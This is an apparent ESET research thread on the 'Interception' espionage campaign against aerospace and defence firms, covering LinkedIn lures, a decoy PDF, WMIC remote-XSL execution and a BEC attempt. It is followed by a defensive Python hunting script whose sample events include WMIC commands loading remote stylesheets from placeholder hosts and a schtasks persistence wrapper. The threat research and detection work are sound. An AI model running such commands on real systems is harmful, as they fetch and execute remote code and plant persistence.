#ESETresearch analyzed operation #Interception, a new espionage campaign targeting aerospace & defense companies in Europe and the Middle East. Initial contact was made via #LinkedIn, where attackers approached targets with fake job offers @jiboutin welivesecurity.com/2020/06/17/ope… 1/5
The attackers sent a password-protected RAR archive containing a LNK file responsible for showing a decoy PDF and downloading additional malware. In some cases, this archive was sent directly through #LinkedIn instant messenger. #ESETresearch 2/5
While the victim was being deceived by the decoy PDF, a scheduled task was created, launching WMIC to execute a script embedded in a remote XSL file. This enabled the attackers to get their initial foothold inside the targeted company and gain persistence on the computer. 3/5
Besides espionage, #ESETresearch saw moonlighting activities from #Interception’s operators. They set up a #BEC scheme by finding an unpaid invoice and reached out directly to the client for payment to a bank account they controlled. Fortunately, it wasn’t successful. 4/5
While we cannot conclusively link this activity to any known groups, technical links to the #Lazarus group exist. Read more about this research on operation #Interception on #WLS welivesecurity.com/wp-content/upl…
IoCs are available on our GitHub repository: github.com/eset/malware-i… 5/5
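
One way to hunt for the behaviour described in tweet 3/5, as an added example that is not from ESET's thread or report: flag process command lines where WMIC's `/format` switch names a stylesheet loaded from a URL or UNC path, and note when the call is wrapped in a scheduled-task creation. The sample events, host names and verdict labels are constructed for illustration; the thread does not give the actual command lines.

```python
import re

WMIC = re.compile(r'\bwmic(?:\.exe)?\b', re.I)
FORMAT = re.compile(r'/format:\s*"?([^"\s]+)', re.I)      # value of WMIC's /format switch
REMOTE = re.compile(r'^(?:https?://|ftp://|\\\\)', re.I)   # URL or UNC path
TASK_CREATE = re.compile(r'\bschtasks(?:\.exe)?\b.*?/create\b', re.I)

def classify(cmdline):
    """Return (verdict, stylesheet) for one process-creation command line."""
    if not WMIC.search(cmdline):
        return ("ignore", None)
    m = FORMAT.search(cmdline)
    if not m:
        return ("ignore", None)
    target = m.group(1)
    if REMOTE.match(target):
        # Stylesheet comes from the network; script embedded in it runs under WMIC.
        verdict = "remote-xsl"
    elif target.lower().endswith(".xsl") or "\\" in target or "/" in target:
        verdict = "local-xsl"      # custom stylesheet on disk: lower priority, still unusual
    else:
        return ("builtin-format", target)   # bare keyword such as csv or hform: routine admin use
    if TASK_CREATE.search(cmdline):
        verdict += "+scheduled-task"        # persistence wrapper, as in the thread
    return (verdict, target)

# Constructed sample command lines (labelled assumptions, not taken from the ESET report).
SAMPLE_EVENTS = [
    r'wmic.exe os get /format:"http://example.invalid/a.xsl"',
    r'wmic process list brief /format:csv',
    r'schtasks /create /tn Upd /tr "wmic os get /FORMAT:\\fileserver.example.invalid\s\b.xsl" /sc daily',
    r'wmic.exe /output:C:\temp\o.html os get /format:hform',
    r'wmic os get /format:C:\Users\Public\d.xsl',
    r'powershell.exe -c Get-Date',
]

def scan(events):
    """Return (index, verdict, stylesheet) for every event worth an analyst's attention."""
    hits = []
    for i, cmd in enumerate(events):
        verdict, target = classify(cmd)
        if verdict.startswith(("remote-xsl", "local-xsl")):
            hits.append((i, verdict, target))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```
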